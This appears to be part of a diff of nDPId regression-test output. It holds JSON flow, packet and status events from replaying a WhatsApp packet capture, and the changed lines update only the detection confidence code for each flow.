00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":553,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655105790019,"flow_last_seen":1655105790019,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655105790019,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47634,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1655105790019,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655105790019,"pkt":"eJS0JASgYDjgxTWgCABFAAA8DWBAAD8G9OHAqAJkszzDMboSFGb46AYSAAAAAKAC\/\/\/MkwAAAgQFtAQCCArIAKx7AAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1655105790049,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655105790049,"pkt":"eJS0JASgYDjgxTWgCABFAAA0DWFAAD8G9OjAqAJkszzDMboSFGb46AYTXUqYTIAQAKwfkAAAAQEICsgArJpsf3jg"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":555,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":3,"flow_last_seen":1655105790056,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655105790056,"pkt":"eJS0JASgYDjgxTWgCABFAAA4DWJAAD8G9OPAqAJkszzDMboSFGb46AYTXUqYTIAYAKzaNwAAAQEICsgArKFsf3jgRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":556,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655105790019,"flow_last_seen":1655105790086,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655105790086,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47634,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":556,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655105790019,"flow_last_seen":1655105790086,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655105790086,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47634,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":561,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":561,"packets-processed":560,"total-skipped-flows":0,"total-l4-payload-len":42315,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":71,"total-detection-updates":0,"total-updates":0,"current-active-flows":7,"total-active-flows":71,"total-idle-flows":64,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":473,"global_ts_msec":1655108001441} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":561,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655108001441,"flow_last_seen":1655108001441,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655108001441,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49610,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":561,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1655108001441,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655108001441,"pkt":"eJS0JASgYDjgxTWgCABFAAA8CbZAAD8G+IvAqAJkszzDMcHKFGbmPQGiAAAAAKAC\/\/9GsQAAAgQFtAQCCApxlpgrAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1655108001604,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655108001604,"pkt":"eJS0JASgYDjgxTWgCABFAAA0CbdAAD8G+JLAqAJkszzDMcHKFGbmPQGj6JAdY4AQAICr2gAAAQEICnGWmOHkUd4Y"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":563,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1655108001607,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655108001607,"pkt":"eJS0JASgYDjgxTWgCABFAAA4CbhAAD8G+I3AqAJkszzDMcHKFGbmPQGj6JAdY4AYAIBmhgAAAQEICnGWmOTkUd4YRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655108001441,"flow_last_seen":1655108001707,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655108001707,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49610,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":569,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655099328045,"flow_last_seen":1655099328610,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655108001999,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49238,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":569,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655100445438,"flow_last_seen":1655100445972,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1655108001999,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49250,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655108001441,"flow_last_seen":1655108001707,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655108001707,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49610,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":569,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655099328045,"flow_last_seen":1655099328610,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655108001999,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49238,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":569,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655100445438,"flow_last_seen":1655100445972,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1655108001999,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49250,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655108385462,"flow_last_seen":1655108385462,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655108385462,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37378,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1655108385462,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655108385462,"pkt":"eJS0JASgYDjgxTWgCABFAAA831VAAD8GIuzAqAJkszzDMZICFGbERxQMAAAAAKAC\/\/+w2QAAAgQFtAQCCAo4haZoAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1655108385503,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655108385503,"pkt":"eJS0JASgYDjgxTWgCABFAAA031ZAAD8GIvPAqAJkszzDMZICFGbERxQNeBSrR4AQAIBROQAAAQEICjiFpqKHOOMP"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":571,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1655108385507,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655108385507,"pkt":"eJS0JASgYDjgxTWgCABFAAA431dAAD8GIu7AqAJkszzDMZICFGbERxQNeBSrR4AYAIAL5AAAAQEICjiFpqaHOOMPRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655108385462,"flow_last_seen":1655108385546,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655108385546,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37378,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655108385462,"flow_last_seen":1655108385546,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655108385546,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37378,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":577,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655108453657,"flow_last_seen":1655108453657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655108453657,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47738,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1655108453657,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655108453657,"pkt":"eJS0JASgYDjgxTWgCABFAAA8GD5AAD8G6gPAqAJkszzDMbp6FGaSP+CCAAAAAKAC\/\/8T9gAAAgQFtAQCCArICfDgAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":578,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1655108453690,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655108453690,"pkt":"eJS0JASgYDjgxTWgCABFAAA0GD9AAD8G6grAqAJkszzDMbp6FGaSP+CDCev7oYAQAKwykAAAAQEICsgJ8QFJX8Bq"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":579,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1655108453696,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655108453696,"pkt":"eJS0JASgYDjgxTWgCABFAAA4GEBAAD8G6gXAqAJkszzDMbp6FGaSP+CDCev7oYAYAKztOAAAAQEICsgJ8QdJX8BqRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":580,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655108453657,"flow_last_seen":1655108453728,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655108453728,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47738,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":580,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655108453657,"flow_last_seen":1655108453728,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655108453728,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47738,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":585,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":585,"packets-processed":584,"total-skipped-flows":0,"total-l4-payload-len":43736,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":74,"total-detection-updates":0,"total-updates":0,"current-active-flows":8,"total-active-flows":74,"total-idle-flows":66,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":491,"global_ts_msec":1655108977493} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":585,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655108977493,"flow_last_seen":1655108977493,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655108977493,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37404,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1655108977493,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655108977493,"pkt":"eJS0JASgYDjgxTWgCABFAAA8FDpAAD8G7gfAqAJkszzDMZIcFGYxkZdqAAAAAKAC\/\/+qXQAAAgQFtAQCCAo4hrwhAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1655108977535,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655108977535,"pkt":"eJS0JASgYDjgxTWgCABFAAA0FDtAAD8G7g7AqAJkszzDMZIcFGYxkZdrFO3l4YAQAIAhNgAAAQEICjiGvEzZk+LX"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1655108977728,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655108977728,"pkt":"eJS0JASgYDjgxTWgCABFAAA4FDxAAD8G7gnAqAJkszzDMZIcFGYxkZdrFO3l4YAYAIDbJQAAAQEICjiGvQvZk+LXRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":588,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655108977493,"flow_last_seen":1655108977793,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655108977793,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37404,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":593,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655101503188,"flow_last_seen":1655101503710,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655108978075,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47296,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":588,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655108977493,"flow_last_seen":1655108977793,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655108977793,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37404,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":593,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655101503188,"flow_last_seen":1655101503710,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655108978075,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47296,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":593,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":593,"packets-processed":592,"total-skipped-flows":0,"total-l4-payload-len":44070,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":75,"total-detection-updates":0,"total-updates":0,"current-active-flows":8,"total-active-flows":75,"total-idle-flows":67,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":498,"global_ts_msec":1655109656108} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":593,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655109656108,"flow_last_seen":1655109656108,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655109656108,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47776,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1655109656108,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655109656108,"pkt":"eJS0JASgYDjgxTWgCABFAAA8kRFAAD8GcTDAqAJkszzDMbqgFGZw+MTeAAAAAKAC\/\/+uLgAAAgQFtAQCCArIDZNpAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":594,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1655109656138,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655109656138,"pkt":"eJS0JASgYDjgxTWgCABFAAA0kRJAAD8GcTfAqAJkszzDMbqgFGZw+MTfqcWd3IAQAKwWxQAAAQEICsgNk4cgPV1+"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":3,"flow_last_seen":1655109656145,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655109656145,"pkt":"eJS0JASgYDjgxTWgCABFAAA4kRNAAD8GcTLAqAJkszzDMbqgFGZw+MTfqcWd3IAYAKzRawAAAQEICsgNk48gPV1+RUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":596,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655109656108,"flow_last_seen":1655109656174,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655109656174,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47776,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":596,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655109656108,"flow_last_seen":1655109656174,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655109656174,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47776,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":601,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":601,"packets-processed":600,"total-skipped-flows":0,"total-l4-payload-len":44353,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":76,"total-detection-updates":0,"total-updates":0,"current-active-flows":9,"total-active-flows":76,"total-idle-flows":67,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":504,"global_ts_msec":1655110961423} 